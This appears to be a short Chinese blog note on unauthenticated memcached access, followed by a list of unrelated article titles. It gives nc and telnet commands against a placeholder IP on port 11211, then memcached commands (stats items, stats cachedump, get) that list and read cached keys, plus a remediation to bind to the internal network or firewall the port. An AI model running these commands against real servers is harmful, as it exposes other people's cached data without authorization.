memcached未授权
2024-10-12 09:01:48
memcached未授权
漏洞成因:
Memcached端口是对外开放的,用nc或Telne可以直接登录,查看信息,增加修改都可以。
nc -vv 1.2.3.4 11211
telnet 1.2.3.4 11211
验证读取key:
stats
stats items
stats cachedump 22 0
get kkkkkkkkkkkk
修复建议:
memcached设置监听内网或配置防火墙限制非必要的远程访问
最新文章
- NotePad++中JSLint的使用
- read properties
- .NET陷阱之六:从枚举值持久化带来大量空间消耗谈起
- RequireJS 模块的定义与加载
- codevs1228 苹果树
- [转]Android中Xposed框架篇—利用Xposed框架实现拦截系统方法
- C#通过反射获取上层调用方法信息
- Java编程思想学习(十一) 泛型
- ATS连接 https
- 【leetcode❤python】27. Remove Element
- heredoc和nowdoc的区别
- 【Linux】设定一个能输入中文的英文环境!
- MFC之RTTI与动态创建
- OVS 总体架构、源码结构及数据流程全面解析
- [TJOI2017]可乐
- Bagging之随机森林
- 基于Servlet的MVC模式用户登录实例
- django中如何实现分页功能
- 使用 vmstat, mpstat 和 sar 查看系统运行参数
- PAT甲级1055 The World's Richest【排序】